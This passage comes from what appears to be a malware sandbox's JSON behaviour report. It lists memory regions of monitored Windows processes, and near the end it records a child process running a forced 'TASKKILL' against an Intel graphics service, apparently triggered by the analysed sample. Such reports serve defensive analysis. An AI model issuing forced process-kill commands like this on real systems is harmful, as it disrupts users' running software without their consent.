"c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:24.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2906", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:24.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2907", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:24.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2908", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:24.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2909", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:24.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2910", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:24.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2911", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:24.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2912", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:24.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 7176191, "entry_point": 0, "filename": null, "id": "region_2913", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:01:24.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2914", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:24.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2915", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:24.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_2916", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:24.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1187839, "entry_point": 0, "filename": null, "id": "region_2917", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:24.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 1245184, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2918", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:01:24.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_2919", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:24.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_2920", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:24.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_2921", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:24.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_2922", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:01:24.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8785919, "entry_point": 0, "filename": null, "id": "region_2923", "name": "pagefile_0x00000000006e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7208960, "timestamp": "00:01:24.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 9633791, "entry_point": 8847360, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2924", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 8847360, "timestamp": "00:01:24.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9961472, "type": "region", "version": 1 }, "end_va": 10223615, "entry_point": 0, "filename": null, "id": "region_2925", "name": "private_0x0000000000980000", "norm_filename": null, "region_type": "private_memory", "start_va": 9961472, "timestamp": "00:01:24.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 31522815, "entry_point": 0, "filename": null, "id": "region_2926", "name": "pagefile_0x0000000000a10000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10551296, "timestamp": "00:01:24.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_2927", "name": "private_0x0000000001e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 31916032, "timestamp": "00:01:24.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2928", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:24.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2929", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:24.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_2930", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:24.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1787953152, "type": "region", "version": 1 }, "end_va": 1788329983, "entry_point": 1788095304, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2931", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1787953152, "timestamp": "00:01:24.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1788346368, "type": "region", "version": 1 }, "end_va": 1788387327, "entry_point": 1788351642, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2932", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1788346368, "timestamp": "00:01:24.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_2933", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:24.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 33816575, "entry_point": 0, "filename": null, "id": "region_2934", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:01:24.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787924479, "entry_point": 1787783961, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2935", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:24.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5505023, "entry_point": 0, "filename": null, "id": "region_2936", "name": "private_0x0000000000500000", "norm_filename": null, "region_type": "private_memory", "start_va": 5242880, "timestamp": "00:01:24.727", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 36761599, "entry_point": 33816576, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2937", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33816576, "timestamp": "00:01:24.727", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36765696, "type": "region", "version": 1 }, "end_va": 37027839, "entry_point": 0, "filename": null, "id": "region_2938", "name": "private_0x0000000002310000", "norm_filename": null, "region_type": "private_memory", "start_va": 36765696, "timestamp": "00:01:24.727", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2939", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:24.727", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2940", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:24.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2941", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:24.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2942", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:24.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9699328, "type": "region", "version": 1 }, "end_va": 9961471, "entry_point": 0, "filename": null, "id": "region_2943", "name": "private_0x0000000000940000", "norm_filename": null, "region_type": "private_memory", "start_va": 9699328, "timestamp": "00:01:24.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37027840, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_2944", "name": "private_0x0000000002350000", "norm_filename": null, "region_type": "private_memory", "start_va": 37027840, "timestamp": "00:01:24.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37683199, "entry_point": 0, "filename": null, "id": "region_2945", "name": "private_0x00000000023b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37421056, "timestamp": "00:01:24.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37879808, "type": "region", "version": 1 }, "end_va": 38141951, "entry_point": 0, "filename": null, "id": "region_2946", "name": "private_0x0000000002420000", "norm_filename": null, "region_type": "private_memory", "start_va": 37879808, "timestamp": "00:01:24.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787699616, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2947", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:24.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2948", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:24.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2949", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:24.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1786404863, "entry_point": 1785919673, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2950", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:24.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1787559936, "type": "region", "version": 1 }, "end_va": 1787658239, "entry_point": 1787564853, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2951", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1787559936, "timestamp": "00:01:24.770", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM igfxCUIService.exe /IM igfxCUIService.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_22", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 22, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2952", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:25.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2953", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:25.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2954", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:25.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2955", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:25.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2956", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:25.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_2957", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:25.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_2958", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:25.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5726207, "entry_point": 5659785, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2959", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 5636096, "timestamp": "00:01:25.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2960", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:25.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2961", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:25.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2962", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:25.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2963", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:25.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2964", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:25.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2965", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:25.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 